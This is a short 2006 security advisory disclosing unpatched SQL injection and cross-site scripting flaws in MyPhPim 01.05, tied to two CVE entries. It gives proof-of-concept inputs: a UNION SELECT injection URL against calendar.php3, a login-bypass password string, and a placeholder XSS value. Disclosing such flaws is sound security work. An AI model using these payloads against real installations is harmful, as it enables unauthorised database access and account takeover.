Multiple SQL Injection and XSS in MyPhPim

Summary

Vulnerability
Multiple SQL Injection and XSS in MyPhPim
Discovered
2006.01.11
Last Update
0 n/a
ID
EV0022
CVE
CVE-2006-0167 CVE-2006-0168
Risk Level
medium
Type
Multiple Vulnerabilities
Status
Unpatched
Vendor
n/a
Vulnerable Software
MyPhPim (http://sourceforge.net/projects/myphpim/)
Version
01.05
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in MyPhPim (http://sourceforge.net/projects/myphpim/) script.

All user defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code or insert any javascript code.

PoC/Exploit

SQL Injection Examples:

URL: http://host/myphpim/calendar.php3? menu=detail&cal_id=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

Login page:
login: [first registered user]
pass: a") or "a"="a"/*

Cross-Site Scripting Example

Create New todo For [user] Page:
Description value: <XSS>

Solution.

Solution for "Multiple SQL Injection and XSS in MyPhPim" is not available. Check vendor's website for updates.